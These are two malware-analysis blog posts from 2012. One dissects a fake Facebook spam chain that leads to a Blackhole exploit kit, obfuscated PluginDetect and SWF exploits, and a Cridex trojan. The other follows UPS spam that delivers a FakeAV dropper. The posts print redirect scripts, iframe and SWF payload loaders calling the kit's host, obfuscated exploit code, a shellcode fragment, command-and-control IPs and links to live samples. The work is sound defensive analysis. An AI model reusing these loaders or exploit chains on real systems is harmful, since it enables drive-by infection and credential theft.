Sunday, November 25, 2012

Full Disclosure: Analysis of Fake Facebook Notification redirect to Obfuscation Blackhole(PluginDetect 0.7.9) and infecting Cridex Malware

Important Case Infector Summary:
Fake Facebook Notif.(hacked WordPress)Redirector Host/IP: demarez.fr(new.htm)/ 88.190.253.248 Blackhole Domain: delemiator.ru Blackhole IP: 216.24.196.66, 202.180.221.186, 203.80.16.81, 208.87.243.131 Blackhole Proxy Port: 8080 Cridex CNC host: 180.235.150.72 Path: /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
I was reported the below spam infection by @Hulk_Crusader, which I opened as HTML like as per below sample: Which the links made me redirected into a WordPress blog page: ↑which lead me to another url as per mentioned above.. I downloaded it to receive HTML page with the below contents, lead us to Blackhole EK
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>  
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://delemiator・ru:8080/forum/links/column.php";}
</script>
</body>
</html>
Is BHEK's URL patternm, I fetched the column.php in the "right" way,
//settings...
--proxy=gatling
--retry=2
--cookies (cookies) to on
--keep-session-cookies (keepsessioncookies) to 1
--save-cookies (savecookies) to mycookies.txt
--user-agent (useragent) to MalwareMustDie was just knocking!
--referer (referer) to h00p://yzicalegur.wordpress.com/2012/11/22/you-have-notifications-pending-5/
//result...
--15:20:35--  h00p://delemiator.ru:8080/forum/links/column.php
           => `column.php'
Resolving delemiator.ru... seconds 0.00, 216.24.196.66, 202.180.221.186, 203.80.16.81, ...
Caching delemiator.ru => 216.24.196.66 202.180.221.186 203.80.16.81 208.87.243.131
Connecting to delemiator.ru|216.24.196.66|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5340 (new refcount 1).
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: h00p://yzicalegur.wordpress.com/2012/11/22/you-have-notifications-pending-5/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: delemiator.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 25 Nov 2012 06:20:32 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
---response end---
200 OK
Length: unspecified [text/html]
15:20:39 (109.45 KB/s) - `column.php' saved [90019]
it contains obfuscated PluginDetect 0.7.9 snipped below:

Here's the original version-->>[PASTEBIN]

Decoding Guide of Obfuscated PluginDetect 0.7.9

I made an easy Decoding Guide on how to code manually here -->>[PASTEBIN] And here's the beautiful format of PluginDetect 0.7.9 burped -->>[PASTEBIN]

Malicious infector files inside of this Exploit Kit

In this post I will focus on writing how to flush BHEK2 malwares. I'll go first with the wellknown malicious infectors "I know" then go to decode - PluginDetect code to burps the rest of the infectors. 1) Firstly, I downloaded a well-known components like: spn.jar, spn2.jar, spn3.jar, t.pdf and getJavaInfo.jar As per described here --->>[PASTEBIN] ↑These samples is as per previously analyze post here -->>[HERE] OK, next, we must see the code, let's seek the PDF infector malwares first... 2) There are 2(two) functions of PDF downloader, p1() & p2(), code is below:
function p1()
 {
   var d=document.createElement("div");
   d.innerHTML = "<iframe src=\"/forum/links/column.php?loh="+x("c833f")+"&gggijbpx="+x("occ")+"&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu="+x(pdfver.join("."))+"\"></iframe>";
   document.body.appendChild(d);
 }
function p2()
 {
   var d=document.createElement("div");
   d.innerHTML = "<iframe src=\"/forum/links/column.php?olnvlwxj="+x("c833f")+"&xdhhdvud="+x("c")+"&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu="+x(pdfver.join("."))+"\"></iframe>";
   document.body.appendChild(d);
 }
Here's how I cracked & downloaded those files-->>[PASTEBIN] I named it infector1.pdf and infector2.pdf, below is analysis report & guide how to decode:
The infector1.pdf Contains 4(four) Adobe Exploit & a shellcode to download malware payload. Adobe version condition per CVE used to infection is as follow: Adobe ver 9 or ver==8 or before 8.12 ====> CVE-2009-0927 Adobe ver 7.1 ====> CVE-2008-2992 Adobe ver 6 or ver 7 before ver < 7.11 ===> CVE-2007-5659 Adobe ver >= 9.1 or ver <= 9.2 or ver >= 8.13 or ver <= 8.17==> CVE-2009-4324 Full guide to analysis is here --->>[PASTEBIN]
The infector2.pdf Contains 1(one) Adobe exploit & shellcode to download malware payload. Exploit CVE-2010-0188 Aiming Adobe Reader ver <= 9.3 of Windows OS. Reference is here -->>[Adobe] Full guide to analysis is here --->>[PASTEBIN]
3) I saw 2(two) functions of SWF downloader, function getCN() & function ff2(), code is as per follows:
function getCN()
 {
   return "/forum/links/column.php?seyjjv="+x("c833f")+"&apvpjz="+x("cvwyb")+"&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe"
 }
function ff2()
 {
   var oSpan=document.createElement("span");
   var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
   oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='"+url+"' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed src='"+url+"' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'></embed></object>";
   document.body.appendChild(oSpan); }  
Just decode the url as per above PDF method, Here's my log in downloading whose SWF's -->>[PASTE]

The details of reversing BHEK 2.x/Plugindetect 0.7.9's field.swf & score.pdf

*) Thanks to @Hulk_Crusader, @Cephrus & @EricOpdyke for stick together to crack this :-) The first swf "field.swf" contains malicious JavaScript Code as per hexed here-->>[PASTEBIN] How the bad guys obfuscating this JS code to avoid AV detction is as follows:
1. The usage of variables with dullname(n+1) like:
   _local1, _local2, _localn,...,_localn+1
2. Camouflage of the malicious JS functions, like:
   [((((("c" + "") + "") + "a") + "l") + "l")]((((((("g" + "") + "e") + "t") + "C") + "") + "N"));
↑This means calling function of callgetCN(), or...
    [((((("c" + "a") + "") + "l") + "") + "l")]((((((((((((("g" + "e") + "t") + "") + "B") + "l") + "o") + "c") + "k") + "S") + "i") + "z") + "e"));
↑This means calling function of getBlockSize(), or...
    [((((("c" + "") + "a") + "l") + "") + "l")]((((((((((((((("g" + "") + "e") + "") + "t") + "A") + "l") + "l") + "o") + "c") + "S") + "") + "i") + "z") + "e"));
↑This means calling function of getAllocSize(), or..
    [((((("c" + "") + "a") + "") + "l") + "l")]((((((((((((("g" + "") + "e") + "t") + "A") + "l") + "l") + "o") + "cC") + "o") + "u") + "n") + "t"));
↑This means calling function of getAllocCount(), or..
   [((((((((((((("w" + "r") + "i") + "t") + "e") + "M") + "u") + "l") + "t") + "i") + "B") + "y") + "t") + "e")]
↑This means calling function of writeMultiByte(), etc. 3. Furthermore malicious exploit exec calls using same obfuscation like:
   [((((((((((((("w" + "r") + "i") + "t") + "e") + "M") + "u") + "l") + "t") + "i") + "B") + "y") + "t") + "e")](u(ExternalInterface[((("c" + "a") + "l") + "l")]((((((((((((("g" + "") + "e") + "t") + "F") + "i") + "l") + "l") + "B") + "y") + "t") + "e") + "s"))), (("u" + "t") + "f-16"));
↑This means:
    writeMultiByte(call(getfillBytes,utf-16));
4. And also the execution of the shellcode function written in PluginDetect:
   [(((((((((((("w" + "r") + "i") + "t") + "e") + "M") + "u") + "l") + "ti") + "B") + "y") + "t") + "e")](u(ExternalInterface[((("c" + "a") + "l") + "l")]((((((((((((("g" + "") + "e") + "t") + "S") + "h") + "e") + "l") + "l") + "C") + "o") + "d") + "e"))), (((("u" + "t") + "f-") + "1") + "6"));
↑This means:
     writeMultibyte(call(getShellCode,utf-16));
5. Some strings manipulation also being obfuscated, like below real example:
   _local13[(((((((("p" + "o") + "s") + "i") + "t") + "") + "i") + "o") + "n")] 
↑This command means: position, to be used in the next variable, like:
   _local13.writeBytes(_local12);
you should replace them like the below to make sense of it:
   position.writeBytes(_local12);
Where the _local12 can be traced↓
   var _local12:* = new ByteArray();
   _local17 = _local12; 
   _local17[(((((((((((("w" + "r") + "i") + "t") + "e") + "M") + "u") + "l") + "t") + "i") + "By") + "t") + "e")](u(ExternalInterface[((("c" + "a") + "l") + "l")]((((((((((((("g" + "") + "e") + "t") + "F") + "i") + "l") + "l") + "B") + "y") + "t") + "e") + "s"))), (((("u" + "t") + "f-") + "1") + "6"));
    //↑writeMultibyte(call(getShellCode,utf-16));
which goes straight to shellcode execution written in PluginDetect logic. 6. You will see some variable initiate with what looks like unused strings like:
   var _local4:* = "zcxJGDRGyr?xwkxnrwZll&tPjcLRV-BkeWmoCLKInByTIh@ktS*KLrTvOxmR!YudlrTwiJpSoJgv?F!UOJ-U&GlcD@bLaaxnECM*JIYYqgzcgUgWV+l*qqMUCDPcg?dnPSlDWdNwCU**qjuCmFSRrWFPsXftJIcbu!GXQbS#JLdpwG&MBTZbM*aoNM?fjnXW!-p@-huCvOHHDRjkZl-hDiq!zJefCugAxcDNZDttqT#CKg&danx?Zp??IbamiA!g#bXaHvENSxZtGRhz?OGH!gkRJcLVjZUmfG-FEV*x?kufOhP#CPAfmgpLI+OEdeKxgJ#QoTgAwTzHViZfuLdEmv@mJTaWqtPGToM#SNkalDsuKEIcxybRWRvOpzwLyAZ!l!NhRAQq#wpGPHQ*RrSSkPeZpTMamIAqtkSrpCIqi#ekFdJrEJZjwzZ+j&ElPboxXlkzU@fRdhqZyHPUOOMQAugjRsidiYrPVDCVswvV!WBTpGtNQpAVRch@vgXd@lvRWAkeuRvx-wYtQgJNxNitRkcJyT@pDN?c&uJmNR?qtbMpldlRKdaLYANcmivSpNuaRLIdWSH*?DrQCNV@n??w-@H*EZkLuHXLv?tmcc#B!efqgIoYtPSJAZXWzmGAYAEhEDKtRL@iZJDmadRz&SHoIr@QnKVqhutl!ExiVPypWNXqy!tvSMHebh@oeVVSeWxac&qDGEgI*TuegMVE!TGlIl-VzBYK@@dFWfrn@AW?v+UgZEhER!kxK!vHJb@ykm!klky+qsUErqrTG?eZhS#!ThoDKf@CZDcdHTIdEnLr@y*TsVxG-AGsISRHgIwp#ksofYmayYT@OyHmRCZL*YGDRmdZzBMfgsOyurjhcTw-TT#AM!yn*rgWOdnmAhR?RPI*gQAgaJc&DTKymIaq?r!yhHVqr!lzxVc?ymvDvBgUPzbfky#*uHPAljgLoIHwHlwOcTlRRUTtsG!ZgCSATvafsYUrag+NL-@H!gHm@F&FD*#rtn@AsNyLu!CEOEm*opZlr?VAH?CiSBbWpJ!+*C+XMkXhTA+jQUSIB*oAtlA-y@mJ@jHjgGqPnNVW&IF*iH?j&Pm*&sQbKOg*UwrfEmK@OAeAZgRaEnExMcxQmnVTRVWqewvNY-tyzC*HAVw?vhi!LVxTqLBksWqs*lOCQ!CwMau+sFLvUm?";
    var _local15:* = "zcxJGDRGyr?xwkxnrwZll&tPjcLRV-BkeWmoCLKInByTIh@ktS*KLrTvOxmR!YudlrTwiJpSoJgv?F!UOJ-U&GlcD@bLaaxnECM*JIYYqgzcgUgWV+l*qqMUCDPcg?dnPSlDWdNwCU**qjuCmFSRrWFPsXftJIcbu!GXQbS#JLdpwG&MBTZbM*aoNM?fjnXW!-p@-huCvOHHDRjkZl-hDiq!zJefCugAxcDNZDttqT#CKg&danx?Zp??IbamiA!g#bXaHvENSxZtGRhz?OGH!gkRJcLVjZUmfG-FEV*x?kufOhP#CPAfmgpLI+OEdeKxgJ#QoTgAwTzHViZfuLdEmv@mJTaWqtPGToM#SNkalDsuKEIcxybRWRvOpzwLyAZ!l!NhRAQq#wpGPHQ*RrSSkPeZpTMamIAqtkSrpCIqi#ekFdJrEJZjwzZ+j&ElPboxXlkzU@fRdhqZyHPUOOMQAugjRsidiYrPVDCVswvV!WBTpGtNQpAVRch@vgXd@lvRWAkeuRvx-wYtQgJNxNitRkcJyT@pDN?c&uJmNR?qtbMpldlRKdaLYANcmivSpNuaRLIdWSH*?DrQCNV@n??w-@H*EZkLuHXLv?tmcc#B!efqgIoYtPSJAZXWzmGAYAEhEDKtRL@iZJDmadRz&SHoIr@QnKVqhutl!ExiVPypWNXqy!tvSMHebh@oeVVSeWxac&qDGEgI*TuegMVE!TGlIl-VzBYK@@dFWfrn@AW?v+UgZEhER!kxK!vHJb@ykm!klky+qsUErqrTG?eZhS#!ThoDKf@CZDcdHTIdEnLr@y*TsVxG-AGsISRHgIwp#ksofYmayYT@OyHmRCZL*YGDRmdZzBMfgsOyurjhcTw-TT#AM!yn*rgWOdnmAhR?RPI*gQAgaJc&DTKymIaq?r!yhHVqr!lzxVc?ymvDvBgUPzbfky#*uHPAljgLoIHwHlwOcTlRRUTtsG!ZgCSATvafsYUrag+NL-@H!gHm@F&FD*#rtn@AsNyLu!CEOEm*opZlr?VAH?CiSBbWpJ!+*C+XMkXhTA+jQUSIB*oAtlA-y@mJ@jHjgGqPnNVW&IF*iH?j&Pm*&sQbKOg*UwrfEmK@OAeAZgRaEnExMcxQmnVTRVWqewvNY-tyzC*HAVw?vhi!LVxTqLBksWqs*lOCQ!CwMau+sFLvUm?";
    var _local16:* = "zcxJGDRGyr?xwkxnrwZll&tPjcLRV-BkeWmoCLKInByTIh@ktS*KLrTvOxmR!YudlrTwiJpSoJgv?F!UOJ-U&GlcD@bLaaxnECM*JIYYqgzcgUgWV+l*qqMUCDPcg?dnPSlDWdNwCU**qjuCmFSRrWFPsXftJIcbu!GXQbS#JLdpwG&MBTZbM*aoNM?fjnXW!-p@-huCvOHHDRjkZl-hDiq!zJefCugAxcDNZDttqT#CKg&danx?Zp??IbamiA!g#bXaHvENSxZtGRhz?OGH!gkRJcLVjZUmfG-FEV*x?kufOhP#CPAfmgpLI+OEdeKxgJ#QoTgAwTzHViZfuLdEmv@mJTaWqtPGToM#SNkalDsuKEIcxybRWRvOpzwLyAZ!l!NhRAQq#wpGPHQ*RrSSkPeZpTMamIAqtkSrpCIqi#ekFdJrEJZjwzZ+j&ElPboxXlkzU@fRdhqZyHPUOOMQAugjRsidiYrPVDCVswvV!WBTpGtNQpAVRch@vgXd@lvRWAkeuRvx-wYtQgJNxNitRkcJyT@pDN?c&uJmNR?qtbMpldlRKdaLYANcmivSpNuaRLIdWSH*?DrQCNV@n??w-@H*EZkLuHXLv?tmcc#B!efqgIoYtPSJAZXWzmGAYAEhEDKtRL@iZJDmadRz&SHoIr@QnKVqhutl!ExiVPypWNXqy!tvSMHebh@oeVVSeWxac&qDGEgI*TuegMVE!TGlIl-VzBYK@@dFWfrn@AW?v+UgZEhER!kxK!vHJb@ykm!klky+qsUErqrTG?eZhS#!ThoDKf@CZDcdHTIdEnLr@y*TsVxG-AGsISRHgIwp#ksofYmayYT@OyHmRCZL*YGDRmdZzBMfgsOyurjhcTw-TT#AM!yn*rgWOdnmAhR?RPI*gQAgaJc&DTKymIaq?r!yhHVqr!lzxVc?ymvDvBgUPzbfky#*uHPAljgLoIHwHlwOcTlRRUTtsG!ZgCSATvafsYUrag+NL-@H!gHm@F&FD*#rtn@AsNyLu!CEOEm*opZlr?VAH?CiSBbWpJ!+*C+XMkXhTA+jQUSIB*oAtlA-y@mJ@jHjgGqPnNVW&IF*iH?j&Pm*&sQbKOg*UwrfEmK@OAeAZgRaEnExMcxQmnVTRVWqewvNY-tyzC*HAVw?vhi!LVxTqLBksWqs*lOCQ!CwMau+sFLvUm?abXwu!cncl!JvcaWTqyXpNorkEnVldW?GYgGNDmSKFwiEqauSYTMSRmIrBEQwPxb-rbHuxiz-@ic&tPh!&BVADXW@jFCGwrEQmlBuAQHtpFW-ajxa*!wKo&KcnqoEsVWnO-aXJcDIMlwkshdPm*JncJVIilDxtaQbYIWzBaSYawQ!eX?rGsri!RVQYLBiCCqpooHhHP#AozyrvUdcCtYVsvIyoP?WUJMcOPJf!qoMOiPVWL+Pmuz-LLmU+xXLT#OAaA+!PhP*MjQse?uRnGgWqNC!iM?zOat#!sbxmeH-ZCEwAucUXgRuPbNGvPzUy+Yn@&oCQwpVWWTcuqEUBpZrv!bC-KzMZMr!d*Ly@nN*x!oSECeqnaF&ZCeNOcFbphES#wg*NAmvuT!MAo#fKBN*&rozfkba@!&tidlLTl?ECrkAAcRsO#E&b?@G?iEhhrUAMqjsfhSk#+nLDKJGViEWdjyNFNLwUh+kbRyGXzLOxxOBLuk-LuqnG??dVzAdKTbcBp&e@YvgMctjX!SOBYCoIqEQLW+KaVUBS*xLfG#xDpSEbotTKYcGv!iK?*!nUbucr-FGH+saxGXoV?IyaH!On+r-WHZ+IQTJZNTt@uPxcaNBeFd?wUipECbXswVKTUoErnLe-CTI*PyxRPu?YXGQVs?R*A-IkjyYeSCLceakszQAMmMviflWSlgoDmROlff@*mcvnPyAblAHjAkXh#LpychVfF#GQNYDd#tuGNhYQaM#wLlTty*O@+NlrgkEFLDwgP?H!kznkUgQvbnbzivKgXiDvdtlWur-kqvvuxIRWHNcsgM-bS-BwcMVqJ&NWKdqPmPt?EHSSoXTXYscBhPxlOpiRhrXdNlohJDh!s*&GekAyGVp*CbOgLsprkECHgIEkyBtKqL-jtNaFdSZqxQAsXpeSsmugPdgupvIHHiW!QX#BKjQWuqMrcHvCeA&OMxcbzlKUfJkyAELR#FftyTrHHAVa&ZCu&XYeDoEqwahfdnbQ#rInjyEYZKMIyjCOspckK-vwTYWzUwqlTSbRiHekhfCMBU&LURksZzatvbsJJnC!OaCrNiAbLoeerfKfNYE*BDvxOGfZ?xtdZcJ&TRlvVUKgRFBrDjca@cCnG&&FfFNreRgP@xHfVglB!WZMzLhdnTxYpprLbgGCpA#SLtllz-rc";
↑The above string only "_local4" is being used (to be pased into [score.swf]), the rest are actually a garbage.
OK, we can read it. Now what does it mean? Here's the simple explanation:
1. It loads the url defined in PluginDetect at [getCN()] function which as per explained above will download the score.swf 2. Exploit the CVE-2011-0611 using the shellcode provided by the [PluginDetect shellcode()] then execute payload download, or.. 3. ..will lead you to directly download payload.
The second swf (score.swf) was decoded here-->>[PASTEBIN] field.swf has the obfuscation pattern as per below:
1. The usage of clattered strings to camouflage the real meaning:
   [(((((((((("v" + "") + "e") + "r") + "") + "s") + "i") + "o") + "") + "") + "n")];
↑This means "version" 2. Obfuscation of Java command in clattered strings in a var:
   _local3[((((("r" + "e") + "ve") + "r") + "s") + "e")]();
↑This means the usage of function: reverse() 3. A "hidden" swap operation of particular strings to null to deobfs code:
   _local2 = this.str_replace(_local2, ((((((((((((((("!" + "X") + "X") + "") + "X") + "X") + "!0") + "3") + "9") + "4") + "3") + "4!") + "X") + "X") + "X") + "!"), "");
↑This means: str_replace("!XXXX!039434XXX!","") command. PS: Many swf malware JS/obfus using this method as per the below case in: i) Contagio blog -->>[HERE], and ii)StopMalvertising blog -->>[HERE] 4. There is an important obfuscation which is the clue of exploit used:
    _local14[(((((((((((("" + "l") + "o") + "") + "a") + "d") + "B") + "y") + "t") + "e") + "") + "") + "s")](this.h2b(_local2));
     _local14 = this;
     _local14[((((((((((("a" + "") + "d") + "") + "d") + "") + "") + "C") + "h") + "i") + "l") + "d")](_local4);
↑This explains loadBytes() and addChild() flash Java functions which are used to load and execute a media.
How the Exploit of score.swf goes?
In this file there's a strings of bytes as per below:
_local13 = new array(54, 54, 69, 51, 54, 57, 65, 48, 49, 48, 70, 70, 48, 69, 53, 52, 56, 49, 53, 48, 57, 53, 70, 50, 49, 70, 49, 68, 70, 51, 54, 48, 57, 53, 54, 68,...
which is gathered by the below generator:
 _local2 = "";
 i = 0;
 while (i < _local13.length) {
     _local2 = (_local2 + string.fromcharcode(_local13[i]));
     i++;
 };
And after filtered and reversed() thus will be load into memory with loadBytes() and addChild() mentioned above. You will see the swf will be crashed & freeing a pointer as per described in- the PoC of CVE-2012-0769 described in BlackHat US 2012-->>[HERE] The concept is the same in pattern of PoC:
for(i=0;i<0x200;i++){bd=new BitmapData(size,0x1,false,0xCCCCCC);} //<#jackpot!
In our case, square pattern was written in strings executed by addChild()
I spent enough time to test score.swf, resulted to that direct payload isn't exist. Yet as per its name, is used to "score" exploit state for execution arbitrary- code of OTHER JS/Code evil functions (either in PluginDetect, other SWF or PDFs) that related to the dropping/downloading payloads of BHEK2.x set. The memory dump of score.swf is here--->>[PASTEBIN]

Conclusion:

1. score.swf,field.swf & PluginDetect's JS functions are calling to each other. implied a set of package, inseparable. 2. Every java functions from PluginDetect0.7.9 are calling to functions under components of infectors after being loaded, and scheme of Exploit + Infections runs in memory, suggesting that all trace of infection can be trace in Forensics or Dynamic Memory Analysis. 3. It is important to know how these moronz obfuscating the code, for the automation tools adjusted and detect these properly.
4) And we have a shellcode functions as below:
function getShellCode()
 { 
   var a="8200!%5482!%4451!%e015!%51d5!%c4c5!%34e0!%5191!.. 
!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7..   
8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3af..
77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!..
   ..1414!%".split("").reverse().join("");
   return str_replace((window.document)?"%!":"", "%u", a) }  
It is important to remember that inside of - this shellcode there is a connection with payload, usually via url, or it dropped binary to download he payloads.. The decoding guide is in here --->>[PASTEBIN] The downloaded payload is a Cridex Trojan, with the following activities:
1. Copied files (itself) using API: CopyFileW(lpExistingFileName: "C:\TEST\sample.exe", lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", bFailIfExists: 0x0)
  Into directory:
   C:\Documents and Settings\User\Application Data\KB00085031.exe
2. Do the self deletion after drop...
3. Creating three memory injection processes:
     CreateRemoteThread(hProcess: 0x7c, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0xf0ed50, lpParameter: 0xf00000, dwCreationFlags: 0x0, lpThreadId: 0x0)
     CreateRemoteThread(hProcess: 0x7c, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0x92ed50, lpParameter: 0x920000, dwCreationFlags: 0x0, lpThreadId: 0x0)
     CreateRemoteThread(hProcess: 0x7c, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0x2a5ed50, lpParameter: 0x2a50000, dwCreationFlags: 0x0, lpThreadId: 0x0)
4. Which resullted the new processes appears below:
   0xb8 KB00085031.exe 
   0xec cmd.exe 0x7e4 
   0x348 svchost.exe 
5. Sends your credentials data to the remote hosts....
For the registry, it made an autorun, change the internet setting & cache, and put a long encrypted data too. Here's Registry Shoot data-->>[PASTEBIN] As for the Network Analysis, it did HTTP/POST to 180.235.150.72 Sending request POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 Communication to CNC in snipped txt is here --->>[PASTEBIN] The malware process that I snapped is as per below: Previous reference of this trojan like analyzed in previous post here -->>[HERE] *) For the Network & Registry analysis raws can be fetched below the sample download.

References

Here's the pic of the total captured files in this story: Here's the sample for the research purpose -->>[CLICK] Here's the PCAP & RegShot full data download -->>[CLICK] Here's my LOG during analysis -->>[CLICK] Below is the VT Analysis Result of unique samples: column.php abcd2644de8c447578d88dd4fd1e3508 VT(2/44) field.swf aab57a979a6411578ae66ed676394d12 VT(8/44) infector1.pdf 465cb634d94d0b16cc1828b6222f0e09 VT(19/44) infector2.pdf 4bb885be4b547aa70d4910422f89d546 VT(20/44) score.swf 8ee6d435e5bb423671bd03728745bd0b VT(9/44) spn.jar 61db98323b8d0512e618f74f70d583ae VT(2/44) spn2.jar 8d0f9fc0a05b2acaecfef2f5d88a1121 VT(4/44) spn3.jar d56e54b431189a1b2a02be243574e829 VT(3/44) t.pdf d1e2ff36a6c882b289d3b736d915a6cc VT(21/43) wpbt0.dll 8229f69bc416cdca7f314f19fe7b4e18 VT(6/42)

#MalwareMustDie

Saturday, November 24, 2012

How, from where, by which IP you got infected w/FakeAV: System Progressive Protection; UPS Fake Spam, Spain's Front End Infector+Support Page, and Taiwan's CnC server

Today I was receiving report of another UPS spam (again, thank's to officer Pryor). Which lead users to download the FakeAV System Progressive Protection. This investigation is exposing all aspect of infection, from which spam, what downloaded trojan downloader used, which CnC used for communication and down to the support page.

Infection Summary

1. Drive by spam 2. w/html URL to h00p://proyectosnavarra.es/CMUNFWKUWY.html ←Troj/Downloader's dropper 3. Trojan Download FakeAV installer from IPs`: 217.76.130.213 (Spain), 59.126.131.132 (Taiwan), 61.222.241.208 (Taiwan) & 217.76.130.3 (Spain) 4. Send data to these IP: 59.126.131.132, 61.222.241.208 (Taiwan) 5. Support Center is in this IP: 178.32.29.188 (Spain)

All of the data written is as per it is, for the law evidence & research purpose I also share the samples and captures. I am so sorry for taking so long analyzing this, since I have only one windows machine to perform all of this analysis.

Here we go..

Following another reported UPS email like below...

Which lead us to the link:
h00p://proyectosnavarra・es/CMUNFWKUWY.html
One thing I LOVE of spam infection is we can fetch it well...
--15:36:04--  h00p://proyectosnavarra.es/Receipt.zip
           => `Receipt.zip'
Resolving proyectosnavarra.es... 217.76.130.213, 217.76.130.3
Connecting to proyectosnavarra.es|217.76.130.213|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 93,060 (91K) [application/x-zip-compressed]
15:36:07 (56.43 KB/s) - `Receipt.zip' saved [93060/93060]
Is a zip alright...
0000   50 4B 03 04 14 00 00 00 08 00 45 87 77 41 F1 63    PK........E.wA.c
0010   BA 03 FE 6A 01 00 00 5C 02 00 12 00 00 00 50 6F    ...j..........Po
0020   73 74 61 6C 5F 52 65 63 65 69 70 74 2E 65 78 65    stal_Receipt.exe
0030   EC BD 7D 7C 54 D5 B5 30 7C 66 E6 64 72 92 4C 72    ..}|T..0|f.dr.Lr
0040   06 48 30 40 80 00 41 D1 A0 46 87 68 E2 10 9C 18    .H0@..A..F.h....
0050   26 C4 8F E0 C4 C0 0C 11 12 E8 15 D2 38 A5 95 C2    &...........8...
0060   39 80 95 40 D2 93 A1 39 39 8E A5 AD DC 6B AF 7A    9..@...99....k.z
0070   2B 0F 7A 1F 7D DA DB DA 56 3E FC 00 67 08 E6 43    +.z.}...V>..g..C
0080   91 86 8F 62 28 41 07 4D 71 8F 27 62 10 4C 26 10    ...b(A.Mq.'b.L&.
0090   72 9E B5 F6 99 99 04 DB FB DE BE EF EF 3E EF FB    r............>..
00A0   CF CB 8F 39 67 7F AC BD F6 DA 6B AF BD F6 5A FB    ...9g.....k...Z.
And this zip file contains a malware (see pic below) What's inside?
// extract it...
$ unzip ./Receipt.zip
Archive:  ./Receipt.zip
extracting: Postal_Receipt.exe
//File timestamps..
-rwxr-xr-x  1 xxx xxx 154624 Nov 23 16:58 Postal_Receipt.exe* <=== see the creaion date, new!

Binary Analysis

Let's "surgery" this Postal_Receipt.exe, looks like a plain PE:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   D1 46 30 9D 95 27 5E CE 95 27 5E CE 95 27 5E CE    .F0..'^..'^..'^.
0090   06 69 C6 CE 94 27 5E CE 8E BA F5 CE B5 27 5E CE    .i...'^......'^.
00A0   8E BA C0 CE 86 27 5E CE 8E BA F4 CE E3 27 5E CE    .....'^......'^.
00B0   9C 5F CD CE 90 27 5E CE 95 27 5F CE CB 27 5E CE    ._...'^..'_..'^.
00C0   8B 75 DA CE 94 27 5E CE 8B 75 CF CE 94 27 5E CE    .u...'^..u...'^.
00D0   52 69 63 68 95 27 5E CE 00 00 00 00 00 00 00 00    Rich.'^.........
00E0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00    ........PE..L...
00F0   C0 63 AF 50 00 00 00 00 00 00 00 00 E0 00 03 01    .c.P............
Some details of binary:
Sections:
   .text 0x1000 0xcfe1 53248
   .rdata 0xe000 0x29d0 10752
   .data 0x11000 0x3a84 7680
   .rsrc 0x15000 0x13ed0 81920
Entry Point at 0xe87
Virtual Address is 0x401a87
Compiler: Microsoft Visual C++ 8
CRC Check Failed, Claimed:  0 Actual:  191423
Compile Time: 0x50AF63C0 [Fri Nov 23 11:53:36 2012 UTC]
MIMEType                 : application/octet-stream
Subsystem                : Windows GUI
MachineType              : Intel 386 or later, and compatibles
TimeStamp                : 2012:11:23 11:53:36+00:00
FileType                 : Win32 EXE
PEType                   : PE32
CodeSize                 : 53248
LinkerVersion            : 9.0
EntryPoint               : 0x1a87
InitializedDataSize      : 100352
SubsystemVersion         : 5.0
OSVersion                : 5.0
It has the strings here --->>[CLICK] This is strings with calls -->>[CLICK] Also is having Calls/DLL List here -->>[CLICK] Having the Functions list here--->>[CLICK] *) those similar functions often seen in the crypted malwares... //Upon starts this binary get environment & execute command line:
loc_40191A:
push    58h
push    offset unk_40FF80
call    sub_403D40
lea     eax, [ebp-68h]
push    eax             ; lpStartupInfo
call    ds:GetStartupInfoW
xor     esi, esi
cmp     dword_414A6C, esi
jnz     short loc_401945
 ↓
loc_401945:
loc_401958:
loc_401953:
loc_40198E:
